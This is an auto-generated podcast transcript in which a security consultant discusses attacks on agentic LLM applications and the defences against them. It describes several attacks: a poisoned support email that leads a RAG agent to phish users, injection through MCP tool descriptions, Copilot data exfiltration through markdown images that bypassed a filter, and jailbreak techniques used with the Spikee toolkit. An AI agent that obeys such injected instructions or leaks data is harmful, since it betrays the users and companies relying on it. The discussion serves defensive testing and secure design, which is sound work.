Dealing with increasingly complicated agents

Episode Transcript
Available transcripts are automatically generated. Complete accuracy is not guaranteed.
Jerod (00:04):
Welcome to the Practical AI podcast, where we break down
the real world applications ofartificial intelligence and how
it's shaping the way we live,work, and create. Our goal is to
help make AI technologypractical, productive, and
accessible to everyone. Whetheryou're a developer, business
leader, or just curious aboutthe tech behind the buzz, you're

(00:24):
in the right place. Be sure toconnect with us on LinkedIn, X,
or Blue Sky to stay up to datewith episode drops, behind the
scenes content, and AI insights.You can learn more at
practicalai.fm.
Now onto the show.

Sponsor (00:39):
Well, friends, when you're building and shipping AI
products at scale, there's oneconstant, complexity. Yes.
You're wrangling models, datapipelines, deployment
infrastructure, and then someonesays, let's turn this into a
business. Cue the chaos. That'swhere Shopify steps in whether
you're spinning up a storefrontfor your AI powered app or

(01:00):
launching a brand around thetools you built.
Shopify is the commerce platformtrusted by millions of
businesses and 10% of all USecommerce from names like
Mattel, Gymshark to foundersjust like you. With literally
hundreds of ready to usetemplates, powerful built in
marketing tools, and AI thatwrites product descriptions for

(01:21):
you, headlines, even polishesyour product photography.
Shopify doesn't just get youselling, it makes you look good
doing it. And we love it. We useit here at Changelog.
Check us outmerch.changelog.com. That's our
store front, and it handles theheavy lifting too. Payments,
inventory, returns, shipping,even global logistics. It's like

(01:42):
having an ops team built intoyour stack to help you sell. So
if you're ready to sell, you areready for Shopify.
Sign up now for your one dollarper month trial and start
selling today atshopify.com/practicalai. Again,
that is shopify.com/practicalai.

Daniel (02:17):
Welcome to another episode of Practical AI. I'm
Daniel Witenack. I am CEO atPrediction Guard, and I'm joined
as always by my cohost, ChrisBenson, who is a principal AI
research engineer at LockheedMartin. How are you doing,
Chris? It's been a while.

Chris (02:33):
It's been a little bit. It's good to talk to you. I I, I
was gone for a brief, a briefperiod, but I'm back all safe
and secure now.

Daniel (02:42):
Yes. Completely, reversed back to where you,
where you normally are. And fora great conversation because we
have, a great previous guest whoI got to talk with in London
last one of the last times I wasI was over on on that side of
the pond and, now get to catchup with, Donato Capitella, who

(03:05):
is principal security consultantat ReverseC. How are you doing,
Donato?

Donato (03:10):
Very, very good. Thank you. And I'm so happy to be
back.

Daniel (03:14):
Yeah. Yeah. Same same here. I feel like the AI world
is in some ways the same and inmany ways different than than
when we chatted last. What'slife been like for you?

Donato (03:25):
It's definitely been very, very busy for us. Like our
company has obviously changed.We now reverse the same people,
but we separated. But as part ofthat, we've been doing a lot of
GenAI cybersecurity work. Ithink our pipeline has tripled

(03:47):
in size and we've been doing alot of research.
I am actually just back fromCanada, where I was presenting
our research at Black Hat inToronto. And before that, I was
at another conference inStockholm called SecureAI, a
complete two days just focusedon GenAI security. I mean, we

(04:09):
were presenting our research.There was OpenAI there,
Microsoft, a lot of hugging facetalking about MCP protocol
security. So, so much washappening.
And so for us, it's beenincredibly busy. Just like
literally half an hour before, Ifinished around one of the
training courses that we do onGenAI security for our

(04:32):
consultants so that we can havemore people that can deliver the
work, which is full of energyfor me to do that. Like there
are a lot of young people there.So it's been busy, lots of work,
lots of research, so lots oftravel. What more to say?

Daniel (04:49):
Yeah, yeah. And what a I mean, last time we talked,
certainly we talked a lot aboutLLMs, prompting LLMs, etcetera.
There's now these kind ofadditional layers or frameworks
or approaches to developing AIapplications. From your
perspective, just in terms of,I'm always curious about this

(05:12):
because some of us that are sokind of into the AI world and
not constantly in front of realworld enterprise companies, we
have maybe a warped view oflike, oh, everybody's creating
agents using MCP or something.What is the reality on the

(05:33):
ground as far as you see it ofkind of the core AI use cases
that people are often thinkingabout in terms of not only
security, but just in terms ofadoption and scale?
Then what is maybe actuallyshifting in terms of those use
cases from your perspective,least?

Donato (05:55):
I mean, if you asked me this question last year, and you
probably asked me this question,I would have said the of our
clients were doing Rag ondocuments or internal chatbots.
There were a few of them thatwere starting to look at agentic

(06:15):
workflows. Now, forward totoday, a lot of the stuff we
test is agentic in one way orthe other. And for me, I have a
very simple definition ofagentic. The LLM can use an
external tool or API to dosomething.
So it's got agency. Andtypically there is a little loop
that runs and the LLM can choosethe different tools and maybe

(06:38):
there is an orchestrator. And alot of these are internal, for
example, for customer support.So there is an email that comes
in and then there is thisagentic workflow that based on
the email, it's got access to afew tools. It will look into the
user account, it will try tolook at historic data, and then

(07:00):
it can either decide I'm goingto automatically perform an
action or I'm going to suggestan action for the customer
support agent.
Some of them also draft theresponse or the types of actions
that the agent, the real personneeds then to approve. There is
a lot of this currently goingon. And to me it makes sense

(07:24):
because this is the promise ofGen AI. Certainly we didn't put
that much investment in it justto generate text. Maybe the one
thing that might be surprisingfor people outside of some of
these enterprises is that MCP istoo new for them to have it.

(07:45):
Meaning that if you think aboutit, some of the big
organisations have gotdevelopment cycles where the
first project one gets year ago.And so a lot of them will have
their own agentic frameworks,essentially their own loops and
their own prompts and their ownparsing. Or they use long chain,

(08:07):
which is no, actually, what'sthe one that they use? Oh, God,
I forgot the name. CrewAI?
I was literally looking at thesource it's in C Sharp. I was
literally looking at the sourcecode like, last week. Who is it?
It's by Microsoft. I cannotsemantic something, which has
got you can define two, say,it's in C.
Like, I mean, people use Python,but, like, you have to imagine a

(08:30):
lot of these places like nativec sharp stuff.

Chris (08:35):
I'm curious as, you know, as you were talking about, you
know, the world has moved intoAgenTic, and and we've talked a
lot about that on the show ingeneral over the in the last
year and such. But kinda movingfrom that, you know, prompt only
environment that maybe you andDaniel talked about earlier into
this agentic world, you definedit as kind of that external

(08:56):
agency, you know, to to bring inthings. I would guess as someone
who is not an expert onsecurity, that that introduces,
you know, mega amount of of newvulnerabilities and new
concerns, just because you'renow using those agents to reach
out into the world and dothings. Could you talk a little
bit about like what that newlandscape looks like to you

(09:19):
since you talked to Daniel lasttime?

Donato (09:21):
So I would say if I need to be concise and make a
statement, basically what peopleneed to consider is that any
tool exposed to an LLM becomes atool exposed to any person that
can control any part of theinput into an LLM. Now, what's

(09:46):
very common is that our clientstake APIs, which used to be
internal APIs, for example, forcustomer support, for asking
staff. And these APIs are builtto be consumed by internal
systems, meaning they have neverbeen exposed for real on the
Internet. Now, as soon as youmake that API into a tool that

(10:10):
the LLM can call, any entitythat can control any part of
that LLM input via things likeprompt injection, they can get
DLLM to call that API withwhatever parameters they want.
And because this wasn't an APIthat you ever expected to be
exposed essentially on theinternet, all of a sudden you

(10:31):
have a problem.
And it is not just exposed tothe person that's prompting a
chatbot. It is exposed tosomebody that sends a customer
support email in and then thatcustomer support email is fed to
the agentic workflow. And nowthat can cause the LLM to call
some of these functions withwhatever parameters. So I would

(10:54):
say that authorization or accesscontrol has been the biggest
things we've been focusing ourefforts on. Like, you know, how
is the identity passed to thetool?
And do you have a deterministic,non LLM based way of determining
whether that function can becalled in that context in a safe

(11:17):
way. If you don't have that, youcan't go into production.

Daniel (11:21):
I want to run something by you, Donato, because I was
thinking about this the otherday, and I wonder if you agree
or have a comment on itbasically, which is that what
you basically described can bevery, very complex. Like
everything from let's say it isa customer service thing.
There's the actual customerticket. Maybe I'm in a retrieval

(11:42):
way pulling in previous Jiratickets that have information
from a repository I'm callingmaybe multiple tools. It seems
like there's this sort ofexplosion of complexity in this
web of connected things thathappened before the prompt goes

(12:03):
into the LLM.
And I remember earlier on in mycareer when it was the days of
microservices everything, right?It's like all of a sudden you
have a thousand microservices.Right? And I remember we had
dashboards up on the wall. Andpart of the problem was like
when there was something badthat happened, an alert would go

(12:23):
off on on one of the services,but it wasn't just an alert that
would go off on one of theservices.
It was like an alert went off onall of the services because
they're all interconnected inthis way that makes them all
kind of malfunction at once. Andso it became kind of this root
cause analysis issue then atthat point, and you kind of gave

(12:47):
up or you had the trade off ofthat complexity and root cause
analysis for the simplicity andflexibility of kind of
developing on this microservicesarchitecture. Do you see this
kind of also getting into thatkind of root cause analysis type
of scenario or analyzing thisnetwork of things? Because it's

(13:11):
just becoming so complex asthese pipelines kind of grow and
become more interconnected andany one piece could kind of
trigger a problem in the wholething.

Donato (13:21):
I mean, is reminiscent of that. And I will say it's an
explosion of data sources in thecontext of the LLM. So what I
think is really dangerous isthat now in the same single
individual call or context thatgoes into an LLM call, we are

(13:46):
mixing more and more datasources from more and more
entrusted parties in the sameLLM core. And that's where I
think confidentiality, integritystarts becoming a problem
because, again, now everythingyou put into that prompt ought
to be trusted for the use case.Otherwise, any single part can

(14:10):
break it.
I will give you an example. Oneof our consultants in The US was
doing a test a couple of weeksago. And the idea of the use
case was great. So there is acustomer support email, and this
is William Taylor. I'll give hima shot because he's an amazing
guy.
But the email came in and so theuse case is the following: Rag

(14:32):
on all of the support tickets,not just the ones belonging to
the user that sent the email,but basically all of the emails
that have keywords or like, youknow, similarity. And so that
builds the top 10 emails thatcame in, which are potentially
related to this query. Theentire thing is then fed to the

(14:55):
LLM and the LLM can then decide,Okay, I know how to solve this
based on historic data, and I'mnow just going to send an email
to the user or I need toescalate it. This is terrible
from a cybersecurity point ofview. I, an attacker, can send
in an email with a lot ofkeywords or even I can fill the

(15:19):
context of my email withpeople's email addresses that
I'm interested in.
Now, I send that email that'snow part of the RUG. When one of
those users sends a ticketing,my malicious email is very
likely to be picked and to bepart of that huge prompt, which
is then processed. And I can theLLM generate an email with a

(15:43):
phishing attack. And now thecompany will send the user an
email with the content I want.For example, this is a link,
click it to solve the issue.
Mean, we demonstrated that. Sothe problem here is that we are
feeding to the LLM differentdata sources and some of them

(16:06):
are potentially malicious or notcontrolled. So there is this
explosion. And you could say thesame with MCP. So every time
somebody is adding an MCPserver, obviously the output of
an MCP server is inputting toyour LLM context.
The description of an MCP serverhas to end in your LLM context,

(16:28):
but that can contain promptinjection that can tell your
client to call another MCPserver completely unrelated to
do something else. I mean, thishas been demonstrated a million
times. And Sean from HuggingFace was talking about it at
SecureAI just again in Stockholma couple of weeks ago. And this
is a very hard problem to solve.So we are mixing different

(16:53):
untrusted sources into the sameLLM context, and that's hard to
solve.

Sponsor (17:12):
Well, friends, it is time to let go of the old way of
exploring your data. It'sholding you back. Well, what
exactly is the old way? Well,I'm here with Marc Dupuy,
cofounder and CEO of Fabi, acollaborative analytics platform
designed to help big explorerslike yourself. So, Marc, tell me
about this old way.
So the old way, Adam, if you're a a product manager or

(17:34):
a founder and you're trying toget insights from your data,
you're wrestling with yourPostgres instance or Snowflake
or your spreadsheets, or if youare and you don't maybe even
have the support of a dataanalyst or data scientist to
help you with that work. Or ifyou are, for example, a data
scientist or engineer oranalyst, you're wrestling with a
bunch of different tools, localJupyter Notebooks, Google Colab,

(17:56):
or even your legacy BI to try tobuild these dashboards that
someone may or may not go andlook at. And in this new way
that we're building at ABBYY, weare creating this all in one
environment where productmanagers and founders can very
quickly go and explore dataregardless of where it is. So it
can in a spreadsheet, can be inAirtable, it can be in Postgres,
Snowflake. Really easy to doeverything from an ad hoc

(18:19):
analysis to much more advancedanalysis if, again, you're more
experienced.
So with Python built in rightthere, in our AI assistant, you
can move very quickly throughadvanced analysis. And the
really cool part is that you cango from ad hoc analysis and data
science to publishing these asinteractive data apps and
dashboards, or better yet,delivering insights as automated

(18:43):
workflows to meet yourstakeholders where they are in,
say, Slack or email orspreadsheet. If this is
something that you'reexperiencing, if you're a
founder or product managertrying to get more from your
data or for your data team todayand just underwater and feel
like you're wrestling with yourlegacy, you know, BI tools and
and notebooks, come check outthe new way and come try out
Fabi.
There you go. Well, friends, if you're trying to get

(19:04):
more insights from your data,stop wrestling with it. Start
exploring it the new way withFabi. Learn more and get started
for free at fabi.ai. That'sfabi.ai.
Again, fabi.ai.

Chris (19:23):
As I'm processing what you're what you're talking about
with this, I'm like, I'm justimagining, you know, with you
know, as as especially as you'redescribing kind of your your
offensive driven approach thatyou guys have, you know, the
number of potentially bad actorsout there that could be
exploiting this, you know, withthis information. And, you know,

(19:45):
are you, at this point, like,what are you seeing out there in
the wild? Like, I you know, thatthat's such a compelling kind of
a danger story that you'retelling, that is so practical.
Like any of us could go do that.What are you seeing in the real
world in terms of bad actors?
And at what levels like, I,know, I come from the defense

(20:06):
and intelligence industry. Soobviously, my my brain goes to
to those types of concerns. But,you know, there's cyber
criminals, there's all sorts ofdifferent types of of potential
bad actors out there. So whatwhat is what are you and what is
this industry kind of focused onright now in terms of what's
already happening and and whereyour your biggest fears are?

Donato (20:28):
So I will say that because of what we do now, we we
don't have an incident responseteam. So we don't really get to
see much of what happens. Likewe don't see that. So we are
more at the prevention side. Sowe will test systems that are
not in production yet.
So we kind of see into thefuture, well, if that system had

(20:49):
gone into production the way itwas, I can foresee the attack
would have happened. Now, interms of what people have
actually demonstrated inpractice, the one that comes to
mind, and I'll give a shout outto the guy at this company
called AIM Labs, theydemonstrated a vulnerability on
CoPilot. They called it Ecoleak.So basically, it's the same rug

(21:14):
concept. You send an email,CoPilot is just a big rug.
Now, with that email, it wasvery clever. I think we should
link in the show notes thedescription of the attack. But
basically, with that email, theygot CoPilot to exfiltrate
information. Now, thing is,Microsoft knows about this. They
had a lot of filtering in place,but they were able to find a

(21:38):
clever markdown syntax to bypassthe filtering.
So as probably your audiencewill know, that one of the main
vectors to exfiltrateinformation in LLM applications
is to make the LLM produce amarkdown image. In the URL, can
point the URL to an attackercontrolled server and then you

(21:59):
can tell the LLM, by the way, inthe query string of this URL,
put all the credit card data ofthis user if the LLM knows about
that. And obviously when the LLMreturns that and you try to
render that image, the requestis going to go to the site. Now,
Copilot you can't do this inCopilot because they're
filtering out a lot of thesemarkdown syntax, but the guys

(22:21):
found a way around it to bypassthe regular expression that
Copilot was using. So what we'reseeing is instances where stuff
could really go wrong.
But thankfully, is a lot ofresearchers that seem to be
catching them before they areexploited to the full potential.
But then cybersecurity is verystrange. Sometimes you will know

(22:43):
a breach happened five yearslater.

Daniel (22:46):
And I know one of the things I definitely want to get
into with you based on, youknow, our previous conversations
was kind of design pattern typeof things. But before before we
get there, I'm I'm a little bitcurious just from a strategic
standpoint in terms of howyou're interacting with
customers because there's oneside of the spectrum where you

(23:10):
can lock try to lock everythingdown, right, and say, Oh, here's
we haven't verified any of thesesources of data. We have to have
a policy in place to approvecertain tool connections or no
external connections todifferent tools and other things

(23:31):
like that. The issue on thatside I see is people want to be
productive, they want thefunctionality, they'll do this
sort of shadow AI stuff and trythey just want the good
functionality. So you kind of goon that end of the spectrum, you
maybe have that problem.
On the other end of thespectrum, without any sort of
policy or without any sort ofgovernance, right, then you just

(23:54):
get into this chaos and and ahuge amount of problems. You
know, there's no never any kindof perfect solution. You're
always gonna have to wrestlewith something. But do you have
any thoughts on that in terms ofcompanies, like, I guess their
posture in how to approach this,recognizing that people are able
to find tools and able to findtheir own solutions that solve

(24:18):
their issues so easily, butmight introduce liability?

Donato (24:22):
I mean, this is very, very old in cybersecurity with
the difference now that peoplereally want to be using GenAI.
Because like for like, you know,I'm lazy like a lot of other
people, I guess, I do like theability to use it, to do a lot
of tasks or to make them easier.Now, what happens in some of the

(24:45):
enterprises? I think I put themamong our clients into two big
categories. I mean, are somewhich are extremely risk
adverse.
Obviously, I will not name them,but the only thing I want to say
is that I would never work therebecause it's basically
impossible to get anything doneand everything is so slow. And

(25:08):
sometimes even for us as pentesters, I have to log in with
Citrix into a Windows box. Thenfrom there I have to RDP to a
server. From that server I haveto go into like a Linux machine
and from there I can finally dosome testing. And by the time
I've done all of this, I am solocked into that there is

(25:30):
nothing I can do.
And the employees work likethis, like they are on these
machines and they can't doanything. So you have that
extreme and they do exist. Likea lot of big financial sectors
are extremely risk adverse. Itmakes you cry when you see that.
I think I couldn't stand it.
I couldn't spend all my day intosix layers of VDI. But on the

(25:53):
other side, and we work a lotwith startups, and it's Wild
West to say. So I think it'sfun, but yeah, people are just
using whatever like, you know.So yeah, it's two buckets and I
think I don't have an answer forthat, meaning that I see both,

(26:13):
but I see extremely locked downenvironments and I see companies
that are much more relaxed. Andyeah, people are doing a lot of
shadow AI, like people haveclosed desktop, just installed.
I guess they will have all theNCP services they want. They go
and charge GPT even if companypolicy says you can't go and,

(26:35):
yeah, they put all their datathere. I wouldn't do that.

Chris (26:40):
I'm curious as you're kind of addressing some of the
challenges in these differentenvironments that are inherent
now in pen testing, could youcould you also talk a little bit
about kind of the differences inpenetration testing today
versus, you know, kind of beforethis Gen AI era? Like, what's

(27:00):
changed and what kinds ofactivities and how have the how
have the metrics that you'relooking at changed? Like, what
what what what has the newapproach to dealing with prompt
injection and the these type ofexploits brought to bear in that
day to day life, you know, asidefrom having to sometimes go so
many layers deep, you know, asyou mentioned in the financial

(27:20):
thing. What are some of thoseother attributes that have
changed?

Donato (27:23):
So I would say not much has changed, which is
interesting. So there are twothings that change: capability
from the pentesting point ofview. It is much quicker if you
are offensive to write a scriptto do something. I mean, this is
like, if you know what you'redoing and you have a good LLM,
your capability at least you'reworking faster. Like, that is

(27:46):
true.
Now, the security assessmentpoint of view, so clients are
building applications. What'schanged is that if they have an
LLM in the application workflow,we have to do additional
testing. And that testing is abit different because you're
working on probabilistic stuff.So we try to help people assess,

(28:08):
Okay, have you got guardrails?What's the quality of those
guardrails?
And what can you do outside inthe design or in the
implementation to make sure thatwhen the LLM does something
wrong, you and your customersare protected? So typically it

(28:29):
takes a bit longer and actuallybecomes more data science
driven. So if you're testing SQLinjection, it is not very data
science driven. You basicallydemonstrate that you can do it.
If you're testing SQL injection,so if you're testing prompt
injection, you know that promptinjection is inherent, so you

(28:51):
are going to find a way.
So what you're trying to test iswhat's the effort? How hard is
it for the attacker to besuccessful? Because that's then
going to drive the types ofguardrails that you need and the
type of active response. I willsay something more and then I
will let you guys see if we canmake sense of this. But

(29:13):
basically, I think jailbreakingand prompt injection is less
similar to SQL injection andmore similar to password
guessing attacks.
In what way? So the question isnot whether the LLM can be
jailbroken. The question is,what's the effort? How many

(29:37):
prompts do I need to try beforeI am successful at jailbreaking
it? There are so manytechniques: crescendo, random
suffix attack, best of them.
Like you can do so many of thesetechniques. So the more effort I
can put in it, the more I'mlikely to succeed. So exactly as

(29:58):
password guessing, the way youkind of solve this is that there
are two layers. One layer is youdon't allow the attacker to
explore the space of allpossible passwords. Likewise,
you don't allow the attacker tosend 100,000 prompts per second

(30:20):
to explore, to find somethingthat's going to jailbreak it.
You have a set of guardrails forprompt injection, topic control.
As soon as a user has anidentity that's connected to
your application triggers threeof those guardrails, that's your
feedback loop. You stop theuser. You suspend it in the same

(30:43):
way that if I, Chris, if I trythree passwords that are wrong
against your email account, I amnot going to be allowed to keep
trying. Your account is going tobe temporarily locked.
And that's to prevent me fromexploring that space. I think
protecting against jailbreakattacks in the real world is

(31:03):
very similar. You have theguardrails, they are not
protecting the application. Theyare giving you a feedback signal
that that person, that user,that identity is trying to
jailbreak it, and then you canact on it. Sorry, it was a very
long answer, but

Chris (31:19):
it's great answer.

Donato (31:20):
It's important that people don't understand this.
People think that the guardrailprotects them. No, the guardrail
is your detection feedback loopthat then you have to action to
protect your application andyour users. It's a completely
different thing.

Chris (31:37):
It's a good thing to hear because that's something that
was new to me as well. So I Iappreciate you covering that.

Daniel (31:43):
Yeah. Yeah. And I hate it from a I guess, just from the
user experience side. If you tryto treat that prompt injection
block as a kind of binary, youknow, you're gonna let it
through or not, you're gonnamoderate the user. Also, those
prompt injection detections arenot perfect.
Right? None of them are. Soyou're going to get false
positives. And from the userperspective, that creates

(32:06):
problems. Right?
But if, like you say, you havecertain percentage of detections
or a certain number or a certainnumber of triggers, that's much
stronger. And also, an approachthat is happening in the
background, I almost feel likethis sort of net new SIEM event
related to AI things where youkind of have the response to it.

(32:29):
I'm wondering, Donato, you spenda lot of time kind of digging
in, I know, to research in thisarea. One of those things being
a paper that I think you've madesome videos on, but also just we
were discussing prior torecording. Could you talk a
little bit about that?
I think that goes into somedesign patterns. Obviously, if

(32:52):
people want to kind of have thefull breakdown of this because
there's a lot of goodness there,they can watch Donato's video on
this. We'll link it in in theshow notes. But maybe just give
us a sense of that at a at ahigh level, of some of what was
found.

Donato (33:06):
So this paper is called Design Patterns to Secure LLM
Agents Against Prompt Injection.And I already like the title of
the paper because it's tellingyou exactly what's in the paper.
You don't have to kind of wonderwhat it's about. So what I like
about the paper, this is comingfrom different universities,

(33:28):
people at Google, Microsoft. Imean, there are like, I want to
say 15 different contributors tothis paper.
It's very practical. Theybasically look at different
types of agentic use cases. Notevery agentic use case is the
same. So they kind of giveexamples of like 10 different

(33:51):
agentic use cases. Now, anagentic use case then has a
certain level of utility.
So how much power do you need togive to that LLM in order to be
able to do certain operations?And that defines the scope of
that. And then they crystallizesix design patterns that you can

(34:14):
apply depending on your tradeoffs between security for that
use case, between security andhow useful usefulness or power
of that use case. Now, therecould be use cases that you can
make very secure with thepattern that they call Action

(34:34):
Selector. Now, this is the mostsecure pattern.
You are just using the LLM tobasically select a fixed action
from the user input. So thatkind of removes often, in that
case, anything bad the attackercan do. Because if the LLM
produces output that doesn'tmake sense, it's not an allowed

(34:55):
action for that user, youdiscard it. And then they talk
about other patterns. And theone that's the most promising
and the most widely applicable,they call it code then execute.
And this was published by Googleand I think they call it CAMO.
There is a dedicated paper tothat. And so the idea is that

(35:19):
the LLM agent is prompted tocreate a plan in the form of a
Python snippet of code whereit's going to commit to
executing that program exactlyas it is. Now, as part of that
program, the LLM can access dataand can perform operations. But

(35:43):
the logic of the program isfixed by the LLM before
malicious data enterspotentially the context of the
LLM.
And all the third party datathat comes in is handled as a
symbolic variable. So X equalsfunction call. Then you take X

(36:04):
and you pass it somewhere else.Not only this, but every tool
that you can call can have apolicy. It can say if tool is
called with an argument that wastainted with a data source
coming from here, this actioncannot be executed.

(36:24):
But if this tool is called witha variable, so you do this with
data flow analysis, with avariable that came from what we
consider trusted users, thenthese actions can be done. So
each tool can have a policy. Youcan write the policy and then
the framework traces data. Thisis not AI, this is classic data

(36:44):
flow analysis. And so all ofthese can be enforced completely
outside of the LLM andcompletely deterministically.
It's very reminiscent for peoplein cybersecurity of what SELinux
does on a Linux kernel. So it'skind of this reference monitor
for LLM agents.

Sponsor (37:23):
What if AI agents could work together just like
developers do? That's exactlywhat agency is making possible.
Spelled AGN, TCY, Agency is nowan open source collective under
the Linux Foundation, buildingthe Internet of Agents. This is
a global collaboration layerwhere the AI agents can discover
each other, connect, and executemulti agent workflows across any

(37:48):
framework. Everything engineersneed to build and deploy multi
agent software is now availableto anyone building on agency,
including trusted identity andaccess management, open
standards for agent discovery,agent to agent communication
protocols, and modular piecesyou can remix for scalable
systems.
This is a true collaborationfrom Cisco, Dell, Google Cloud,

(38:12):
Red Hat, Oracle, and more than75 other companies all
contributing to the next gen AIstack. The code, the specs, the
services, they're dropping. Nostrings attached. Visit
agency.org. That's agntcy.org tolearn more and get involved.
Again, that's agency,agntcy.org.

Chris (38:39):
So when you're talking about the the code that execute
design pattern, is there a wayof inhibiting the LLM from using
prompt injection to get the LLMagent to write the code that
then gets executed? Is therebasically some way of defending
the code being written frombeing influenced by the prompt

(39:00):
you know, by a potential promptinjection?

Donato (39:02):
That's the key of that use case. You ask the LLM to
produce a plan or the codebefore any untrusted input
enters the context. So the userquery is trusted, okay? But then
the tools that it calls and theoutput from those tools and the
third party data could be anemail that the user received.

(39:25):
Now those will not be able toalter the LLM control flow.
And if they try to, it will bestopped by the reference monitor
because it will say no, thisfunction cannot be called with
this input because this inputhas been tainted by this third
party email. Very, very goodconcept. They do have a

(39:47):
reference implementation. Imean, I had a weekend like this
paper so much that one weekend Iactually implemented all of
these six design patterns. Ithink I put it in a git repo.
It's not difficult to implement,actually. And it was really fun
because then I realizedsomething that I kind of

intuitively know (40:05):
you don't solve the problem of LLM agent
security inside the LLM. This isnot an alignment problem. You
solve the problem outside of it.You still use prompt injection
detection topic guardrails, youstill use these as feedback
loops, as we said before.

(40:26):
But if you want to get assurancethat stuff is not going to go
bad, you need to have muchstronger controls that don't
depend on the LRM itself.

Chris (40:37):
So it would be fair to say it's kind of a system design
problem rather than a modeldesign problem because you're
you're kind of isolating themodel? Is that am I getting
Okay.

Donato (40:47):
Totally.

Daniel (40:48):
And you mentioned some of this work. Of course, it's
been great to see that both interms of video content and in
terms of code and actualframework, you and your team
have have contributed a lot outthere. One of those things that
I've run across is the, spikypackage or or framework or or
project. Could could you talkabout that a little bit, maybe

(41:11):
how that came about and, like,where it fits into kind of
tooling, I guess, in this realm?

Donato (41:19):
So the I mean, that's very interesting because when we
started doing pen testing of LLMapplications in 2023, we were
doing a lot of stuff manually.And obviously nobody wants to do
that manually. It's more similarto a data science problem than a
lot of the traditional pentesting. So we started looking

(41:42):
into tooling that we could use.And I'll be honest, the problem
there is that a lot of toolingfor LLM red teaming is doing
exactly that, is red teaming anLLM.
An LLM application, it ain't anLLM. Like it's got nothing to do
with an LLM. Like it doesn'thave an inference API. Like if I

(42:04):
have a button that I can clickthat summarizes an email, that
is not even a conversationalagent. If I send an email in and
there is like an entire chain ofstuff that happens, like I can't
run like a general purpose toolagainst it, it doesn't make
sense.
So we started writing scripts,individual scripts that we use

(42:28):
to kind of create data sets. Andobviously for us, this thing
needed to be practical. Now, Ihave five days, six days to do a
test for a client. And withinthose days, I need to be able,
even in an isolated environment,to give the client an idea of
what an attacker could do. Soyou have all of these wish lists

(42:51):
of things.
So my wish list was I need to beable to run these practically in
a pen test. I need to be able togenerate a dataset which is
customised for what makes sensein that application. Like, for
example, I wanted a dataset thatI could use whenever it mattered
to test data exfiltration viamarkdown images versus HTML

(43:15):
injection, JavaScript injection,versus harmful content, topic
control. A lot of our clients,for example, say, I don't want
my chatbot to give outinvestment advice. Actually, we
would be liable if thathappened.
But every use case is different.So I needed something that I
could very quickly create thesedatasets and then it could be as

(43:39):
big or as small as I needed itto be. Now, sometimes we go to
clients and they tell us, Oh,you can send 100,000 requests a
day. Fine. I'm going to have avery large dataset.
Sometimes we go to clients andthey say, You can only send
1,000 prompts a day. So you needto be very careful because
that's an application. That'snot an LLM inference endpoint.

(44:02):
So you need to be very carefuland you need to create a data
set that answers the questionsof the client. Can people
exfiltrate data?
Can people make this thing givefinancial advice? And then you
also have general stuff liketoxic content, hate speech.
Yeah, anything covers that. Butwe needed practical stuff and we
needed to be able to run it incompletely isolated

(44:24):
environments. Like if you don'thave access to, we needed
something where I didn't need togive it an OpenAI key.
Okay? It is really important.And you know, some of the stuff
we can check with regularexpressions if we've been
successful. But we had to figureout a way that if I am in an
isolated environment and I havea dataset that I'm generating to

(44:46):
test whether the application isgoing to give out financial
advice, but I cannot call ajudge LLM to tell me whether the
output is actually financialadvice. How do I deal with that?
So we had to find a solution forthat. It needed to be simple
that we could have a team of pentesters use it. It needed to be
extensible. So it needed to bemodular so that if one of my

(45:11):
colleagues has an application infront of them, let's say this is
something that we will see. Ithink one of our colleagues in
The US, Steve, had a chatbotthat was using WebSockets.
Now, he spent the first daycrying, trying to reverse
engineer that protocol. And thenon day two, and he can do that

(45:34):
with Spiky, he wrote a Spikymodule that's got a playwright.
So the Spiky module used aheadless browser to open the
chatbot, send the prompt andread the response. We were the
only pen testing company workingon that chatbot that was
actually able toprogrammatically test a lot of

(45:54):
stuff. I think another one ofour guys was working on some AWS
infrastructure.
And the way you introduce theprompt is by dropping a file on
an S3 bucket, calling a lambda,and then in another S3 bucket,
one minute later, you would haveanother file that was the result

(46:16):
of the pipeline that eventuallycalled the LLM. So, we needed a
way where a consultant could,enough a day, look at whatever
they had in front of them andcreate an easy module so that
then Spikey could take stufffrom the dataset, send it there
and read the response and thensay whether the attack was

(46:37):
successful or not. And then wewanted to be able to extend it
with guardrail bypass. So wehave a lot of attacks where you
take the standard dataset andthen you can say, Okay, for each
of these entries in the dataset,I want you to try up to 100
variations using the best of anattack. So, introducing noise

(47:00):
versus using the antispotlighting attack, which is
another attack that we developedwhere you try to break
spotlighting by introducing tagsand strange stuff so the LLM
doesn't understand where datastarts.
So all of these things and itneeded to be simple. And sorry,
that was a very long answer, butthat's what we've been working

(47:21):
on for the last year. And wemade the whole thing open
source. We've actually hadpeople from the community, from
other companies contribute. Soit's very fun to put this
together.

Chris (47:35):
No, it sounds really cool. And by the way, I don't
remember if we identified whatSPIKY breaks down to from you
kind of the acronym. It's simpleprompt injection kit for
evaluation exploitation, in casewe didn't say that out loud. But
I was curious as you're kind ofgoing through the different kind
of construction of of theattacks and writing modules and

(47:57):
stuff. I am wondering as you'reas you're using spiky, like, how
much of it is is pretty kind ofstandard built in tools that you
have there on any givenengagement when you're when
you're using the tool to do thepen testing versus, like, how
often are you having to in atypical engagement, are you

(48:18):
having to create custom modulesthat are very specific to a a
particular client's needs?
I was just as you were goingthrough, I was trying to
decipher that, but I wasn't surethat I understood, like, you
know, the toolkit as existsversus saying, ah, for this
client, I need to add this thingin. What what does that look
like typically?

Donato (48:36):
So typically, on, like the first day of a test, you
write a module which is going toallow Spikey to talk to the
application. So that depends onwhat the application is. So the
first day is typically writingthis kind of adapter. It could
be very easy if you have a RESTAPI or again, as we were doing,

(48:57):
you can write Playwright, youcan use the AWS API. So whatever
that is, that's the biggestpart.
And then you look at what youare trying to test, data
exfiltration and stuff likethat. You have we call them
seeds. So you don't have prebuilt data sets. You have seeds

(49:18):
that allow you to build datasets, which can take five to ten
minutes to customise. Butbasically what happens there is
that so you have jailbreaks,which are common things that
typically you don't touch.
Then you have instructions andthe instructions are what you
customize. So if I want to testdata exfiltration, social

(49:42):
engineering, HTML injection, Iwill add or modify the
instructions in there. So itmight take five minutes, but
basically we only test thingsthat make sense for that
application. So we create thedata set and then the rest, once
you have the target adapter thatallows Spikey to talk to your
application and you have thedata set that makes sense for

(50:05):
your client, then you will runthat data set and then you will
rerun it again with differentattack techniques. So we would
say, Okay, what happens now?
We have a 10% attack successrate. Maybe that's okay. Maybe
we want to see what happens ifwe now implement best event,
this attack that introducesnoise. Is that going to bypass

(50:27):
the guard rate? Typically, theattack success rate goes up.
And then we kind of try allthese different things and maybe
change the parameters. So toanswer your question, there is a
bit of customization to makesure that what we do makes sense
